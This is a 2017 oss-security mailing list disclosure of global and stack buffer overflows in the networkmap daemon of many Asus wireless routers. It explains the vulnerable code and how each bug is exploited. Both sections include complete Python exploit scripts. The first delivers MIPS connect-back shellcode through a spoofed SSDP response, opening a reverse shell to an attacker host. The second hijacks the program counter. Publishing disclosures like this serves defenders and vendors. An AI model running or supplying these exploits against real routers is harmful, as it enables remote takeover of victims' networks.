Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 12 Jul 2017 15:52:16 +0800
From: "逢坂河河、、" <598930392@...com>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: Asus wireless routers Global buffer overflow and Stack buffer overflow in networkmap

=============================================================
                                               Global buffer overflow
=============================================================

[Vulnerability]:
Global buffer overflow in networkmap


------------------------------------------
[Exploitation]:
Can write data at any address in heap


------------------------------------------
[Vendor of Product]:
Asus wireless router


------------------------------------------
[Affected Products and firmware version]:
Asuswrt-Merlin ,all the firmware and the latest firmware is 380.66_6
RT-AC5300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1900P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68P 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC88U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC58U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7485
RT-AC56U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC55U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-AC52U 	,all the firmware,and the latest firmware is 3.0.0.4.380.4180
RT-AC51U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N18U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-N66U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N56U 	,all the firmware,and the latest firmware is 3.0.0.4.378.7177
RT-AC3200 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC3100 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1200GU ,all the firmware,and the latest firmware is 3.0.0.4.380.5577
RT_AC1200G ,all the firmware,and the latest firmware is 3.0.0.4.380.3167
RT-AC1200 ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-AC53 	,all the firmware,and the latest firmware is 3.0.0.4.380.9883
RT-N12HP 	,all the firmware,and the latest firmware is 3.0.0.4.380.2943
RT-N12HP_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.3479
RT-N12D1 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N12+ 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT_N12+_PRO ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-N16 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N300 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378


------------------------------------------
[Attack Type]:
Remote


------------------------------------------
[Can Cause Denial of Service?]:
yes


------------------------------------------
[Reference]:
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/  (chose the others can download the firmware sourcecode)
https://www.asus.com/Networking/Wireless-Routers-Products/


------------------------------------------
[Discoverer]:
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/


------------------------------------------
[Affected components]:
Affected executable application: networkmap
Affected source code file: \release\src\router\networkmap\function.c
Affected function: store_description(char *msg)


------------------------------------------
[Vulnerability description]:
When the function process_device_repsonse of networkmap is parsing the 
SSDP answer from a device and the SSDP answer has indicated the location like:
	HTTP/1.1 200 OK
	Location:HTTP://host:port/path
If the "HTTP://host:port/path" is valid, the networkmap will get the 
device descirption xml by accessing "HTTP://host:port/path",and it will use 
the function store_description to store the device descirption information 
to global sturct device_info.
In the function store_description,there's no limit to the variable s_num,
so that it can cause the global sturct device_info overflow when copy the
data from tmp to description.service[s_num].url .


------------------------------------------
[Vulnerability details]:
In the \release\src\router\networkmap\function.c,
It define the global struct device_info description and the function store_description:
...
struct device_info description;
...
void store_description(char *msg)
{
		...
        int s_num = 0;
		...
		while( p!= NULL && p < body)
        {
		...
		switch(type)
		{
		...
        case 7:
            strlcpy(description.service[s_num].url, tmp, sizeof(description.service[s_num].url));
            NMP_DEBUG_F("service %d url = %s\n", s_num, tmp);
            s_num++;
            break;
        }
        }
        ...
}


You can see that the s_num variable is incremented in case 7,
But in the while( p!= NULL && p < body),it never check the s_num variable.
And in the \release\src\router\networkmap\networkmap.h,it define the struct device_info:
...
#define LINE_SIZE               200
#define SERVICE_NUM             10
struct service
{
        char name[LINE_SIZE];
        char url[LINE_SIZE];
};
struct device_info
{
        char friendlyname[LINE_SIZE];
        char manufacturer[LINE_SIZE];
        char description[LINE_SIZE];
        char modelname[LINE_SIZE];
        char modelnumber[LINE_SIZE];
        char presentation[LINE_SIZE];
        struct service service[SERVICE_NUM];
        int service_num;
};


Because SERVICE_NUM = 10,so,in the case 7 which in the function store_description, 
when the s_num variable has be incremented and the s_num > 10,
the data copy to struct device_info description.service[s_num].url will overflow.


------------------------------------------
[Exploitation details]:
When the networkmap get the device descirption xml by accessing "HTTP://host:port/path",
we can respond a device descirption xml like:
<?xml><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL><><SCPDURL>shellcode<></root>
the shellcode will be written to the memory that out of the global struct device_info description.


And then,because the memory maps for networkmap is:
admin@...N12HP_B1:/# cat /proc/$(pidof networkmap)/maps
00400000-0040a000 r-xp 00000000 1f:02 104        /usr/sbin/networkmap
0041a000-0041b000 rw-p 0000a000 1f:02 104        /usr/sbin/networkmap
0041b000-00420000 rwxp 0041b000 00:00 0          [heap]
2aaa8000-2aaae000 r-xp 00000000 1f:02 733        /lib/ld-uClibc.so.0
2aaae000-2aaaf000 rw-p 2aaae000 00:00 0 
2aab0000-2aab6000 rw-s 00000000 00:07 0          /SYSV000003e9 (deleted)
2aab6000-2aaba000 rw-s 00000000 00:07 32769      /SYSV000003ea (deleted)
2aabd000-2aabe000 r--p 00005000 1f:02 733        /lib/ld-uClibc.so.0
2aabe000-2aabf000 rw-p 00006000 1f:02 733        /lib/ld-uClibc.so.0
2aabf000-2aaeb000 r-xp 00000000 1f:02 164        /usr/lib/libshared.so
2aaeb000-2aafa000 ---p 2aaeb000 00:00 0 
2aafa000-2aafe000 rw-p 0002b000 1f:02 164        /usr/lib/libshared.so
2aafe000-2ab0f000 rw-p 2aafe000 00:00 0 
2ab0f000-2ab11000 r-xp 00000000 1f:02 235        /usr/lib/libnvram.so
2ab11000-2ab21000 ---p 2ab11000 00:00 0 
2ab21000-2ab22000 rw-p 00002000 1f:02 235        /usr/lib/libnvram.so
2ab22000-2ab30000 r-xp 00000000 1f:02 732        /lib/libgcc_s.so.1
2ab30000-2ab40000 ---p 2ab30000 00:00 0 
2ab40000-2ab41000 rw-p 0000e000 1f:02 732        /lib/libgcc_s.so.1
2ab41000-2ab79000 r-xp 00000000 1f:02 728        /lib/libc.so.0
2ab79000-2ab89000 ---p 2ab79000 00:00 0 
2ab89000-2ab8a000 rw-p 00038000 1f:02 728        /lib/libc.so.0
2ab8a000-2ab8e000 rw-p 2ab8a000 00:00 0 
2ab8e000-2ab96000 r--s 00000000 00:0b 297        /dev/nvram
7fc20000-7fc35000 rwxp 7fc20000 00:00 0          [stack]
7fff7000-7fff8000 r-xp 7fff7000 00:00 0          [vdso]


Both the Program address and the Heap address are not randomized and Continuous.
So when the global struct device_info overflow ,the shellcode could be write to 
the heap ,and the shellcode address in the heap is fixed and Controllable.


------------------------------------------
[exp.py]:
# Tested product and firmware version:
# RT-N12HP_B1 (3.0.0.4.380.3479)


# coding=utf-8


ROUTER_IP = '192.168.2.1'	    #asus wireless router ip
IP = '192.168.2.31'		        #attacker ip
INTERACE = 'eth0'			    #attacker host network interface
CONNECTBACK_IP = '192.168.2.31' #the host ip use for connectback shell shellcode
								#the default connectback port is 30583
                                
import time
import socket
import sys
import os
import threading
import socketserver


sc = '<?xml><SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += '<>'
sc += '<SCPDURL>'
sc += b'\xff\xff\x04\x28'
sc += b'\xbb\x0f\x02\x24'
sc += b'\x0c\x01\x01\x01'
sc += b'\xfa\xff\x0f\x24'
sc += b'\x27\x78\xe0\x01'
sc += b'\xfd\xff\xe4\x21'
sc += b'\xfd\xff\xe5\x21'
sc += b'\xff\xff\x06\x28'
sc += b'\x57\x10\x02\x24'
sc += b'\x0c\x01\x01\x01'
sc += b'\xff\xff\xa2\xaf'
sc += b'\xff\xff\xa4\x8f'
sc += b'\xfd\xff\x11\x24'
sc += b'\x27\x88\x20\x02'
sc += b'\xe2\xff\xb1\xa7'
sc += b'\x77\x77\x0e\x24'
sc += b'\xe4\xff\xae\xa7'
sc += socket.inet_aton(CONNECTBACK_IP)[0] + socket.inet_aton(CONNECTBACK_IP)[1] + b'\x0e\x34'
sc += b'\xe6\xff\xae\xa7'
sc += socket.inet_aton(CONNECTBACK_IP)[2] + socket.inet_aton(CONNECTBACK_IP)[3] + b'\x0e\x24'
sc += b'\xe8\xff\xae\xa7'
sc += b'\xe2\xff\xa5\x27'
sc += b'\xef\xff\x0c\x24'
sc += b'\x27\x30\x80\x01'
sc += b'\x4a\x10\x02\x24'
sc += b'\x0c\x01\x01\x01'
sc += b'\x21\x28\x20\x02'
sc += b'\xdf\x0f\x02\x24'
sc += b'\x0c\x01\x01\x01'
sc += b'\xff\xff\x10\x24'
sc += b'\xff\xff\x31\x22'
sc += b'\xfa\xff\x30\x16'
sc += b'\xff\xff\x06\x28'
sc += b'\x2f\x2f\x0f\x24'
sc += b'\xec\xff\xaf\xa7'
sc += b'\x62\x69\x0f\x24'
sc += b'\xee\xff\xaf\xa7'
sc += b'\x6e\x2f\x0e\x24'
sc += b'\xf0\xff\xae\xa7'
sc += b'\x73\x68\x0e\x24'
sc += b'\xf2\xff\xae\xa7'
sc += b'\xf4\xff\xa0\xaf'
sc += b'\xec\xff\xa4\x27'
sc += b'\xf8\xff\xa4\xaf'
sc += b'\xfc\xff\xa0\xaf'
sc += b'\xf8\xff\xa5\x27'
sc += b'\xab\x0f\x02\x24'
sc += b'\x0c\x01\x01\x01'
sc += '<></root>'


def mac():
    os.system('macchanger -A {}'.format(INTERACE))


os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP))


class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):


    def handle(self):
        print('[-] got shellcode request')
        self.request.recv(1024)
        print("[-] sending shellcode")
        self.request.send(sc)


class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass


socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
t = threading.Thread(target=server.serve_forever)
t.start()


print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction")


addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('239.255.255.250', 1900))
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))


mac()
times = 0
state = 'Overflow'


while True:
    data, sender = s.recvfrom(1500)
    if sender[0] == ROUTER_IP and sender[1] == 1008:
        print("[-] received SSDP M-SEARCH Package")


        data = {}
        data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/A\r\n\r\n'


        sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        sock.sendto(data[state], sender)


        if state == 'Overflow':
            print("[-] Send the GetXmlRequest to router")
            time.sleep(20)
            os._exit(0)



=============================================================
                                               Stack buffer overflow
=============================================================


[Vulnerability]:
Stack buffer overflow in networkmap


------------------------------------------
[Exploitation]:
Can control the $pc.
Together with the above Global buffer overflow vulnerability,
can remote code execution and then get a connectback shell. 


------------------------------------------
[Vendor of Product]:
Asus wireless router


------------------------------------------
[Affected Products and firmware version]:
Asuswrt-Merlin ,all the firmware and the latest firmware is 380.66_6
RT-AC5300 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1900P ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC68P 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC88U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC66U_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC58U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7485
RT-AC56U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC55U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-AC52U 	,all the firmware,and the latest firmware is 3.0.0.4.380.4180
RT-AC51U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N18U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-N66U 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N56U 	,all the firmware,and the latest firmware is 3.0.0.4.378.7177
RT-AC3200 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT-AC3100 ,all the firmware,and the latest firmware is 3.0.0.4.380.7743
RT_AC1200GU ,all the firmware,and the latest firmware is 3.0.0.4.380.5577
RT_AC1200G ,all the firmware,and the latest firmware is 3.0.0.4.380.3167
RT-AC1200 ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-AC53 	,all the firmware,and the latest firmware is 3.0.0.4.380.9883
RT-N12HP 	,all the firmware,and the latest firmware is 3.0.0.4.380.2943
RT-N12HP_B1 ,all the firmware,and the latest firmware is 3.0.0.4.380.3479
RT-N12D1 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N12+ 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT_N12+_PRO ,all the firmware,and the latest firmware is 3.0.0.4.380.9880
RT-N16 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378
RT-N300 	,all the firmware,and the latest firmware is 3.0.0.4.380.7378


------------------------------------------
[Attack Type]:
Remote


------------------------------------------
[Can Cause Denial of Service?]:
yes


------------------------------------------
[Reference]:
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/  (chose the others can download the firmware sourcecode)
https://www.asus.com/Networking/Wireless-Routers-Products/


------------------------------------------
[Discoverer]:
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/


------------------------------------------
[Affected components]:
Affected executable application: networkmap
Affected source code file: \release\src\router\networkmap\function.c
Affected function: store_description(char *msg)


------------------------------------------
[Vulnerability details]:
When the function process_device_repsonse of networkmap is parsing the SSDP answer 
from a device and the SSDP answer has indicated the location like:
	HTTP/1.1 200 OK
	Location:HTTP://host:port/path
If the "HTTP://host:port/path" is valid, the networkmap will get the device descirption 
xml by accessing "HTTP://host:port/path",and it will use the function store_description 
to store the device descirption information to global sturct device_info.


In the switch case 6 which in the function store_description:


    case 6: // tmp="urn:schemas-upnp-org:service:serviceType:v"
		mxend = tmp;
		i = 0; j = 0;
		while(i != 4)
		{
			if(i == 3)
			tmp[j++] = *mxend;
			if(*mxend == ':')
			i++;
			mxend++;
		}
		tmp[j-1] = '\0';
		strlcpy(description.service[s_num].name, tmp, sizeof(description.service[s_num].name));
		NMP_DEBUG_F("service %d name = %s\n", s_num, tmp);
		break;
						
if it couldn't found the fourth ':' in the stack, the stack buffer tmp will be overflow, 
and this stack-based overflow can be used to gain control over networkmaps control flow 
by overwriting the saved $ra stored on the stack.


------------------------------------------
[Exploitation details]:
when answer the SSDP request, we can send the SSDP answer message like:
	'HTTP/1.1 200 OK\r\nLocation:HTTP://192.168.2.31:1337/' + 'B'*231 + b'\x41\x41\x41:' + '\r\n\r\n'
And When the networkmap get the device descirption xml by accessing "HTTP://192.168.2.31:1337/",
we can respond a device descirption xml like:
	<?xml><serviceType>AAAA<></root>
And then, after the code in case 6,the stack buffer tmp will be overflow,and the 
data start from stack buffer tmp will become 'B'*231 + b'\x41\x41\x41',
and it lead to the $ra and $pc being set to 0x00414141.


Now we can control the $pc by overwriting the saved $ra stored on the stack. 
For further exploitation,to get a ConnectBack shell,we can use the "Write data
at any address in heap" vulnerability which also in function store_description,
to write the ConnectBack shell shellcode on a fixed heap address,and then we 
can use this Code Execution vulnerability to let $pc be set as the ConnectBack shell shellcode address.


------------------------------------------
[exp.py]:
# Tested product and firmware version:
# RT-N12HP_B1 (3.0.0.4.380.3479)


# coding=utf-8


ROUTER_IP = '192.168.2.1'	    #asus wireless router ip
IP = '192.168.2.31'		        #attacker ip
INTERACE = 'eth0'			    #attacker host network interface


import time
import socket
import sys
import os
import threading
import socketserver


sc = '<?xml>'
sc += '<serviceType>'
sc += b'AAAA' * 49
sc += 'AA<></root>'


def mac():
    os.system('macchanger -A {}'.format(INTERACE))


os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERACE, INTERACE, IP, ROUTER_IP))


class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):


    def handle(self):
        print('[-] got xml request')
        self.request.recv(1024)
        print("[-] sending xml")
        self.request.send(sc)


class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass


socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
t = threading.Thread(target=server.serve_forever)
t.start()


print("[-] Please opens a new terminal and use ping ROUTER_IP to Speed up SSDP network interaction")


addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('239.255.255.250', 1900))
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))


mac()
times = 0
state = 'Overflow'


while True:
    data, sender = s.recvfrom(1500)
    if sender[0] == ROUTER_IP and sender[1] == 1008:
        print("[-] received SSDP M-SEARCH Package")


        data = {}
        data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/' + 'B'*231 + b'\xe0\xbb\x41:' + '\r\n\r\n'


        sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        sock.sendto(data[state], sender)


        if state == 'Overflow':
            print("[-] Send the GetXmlRequest to router")
            time.sleep(20)
            os._exit(0)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ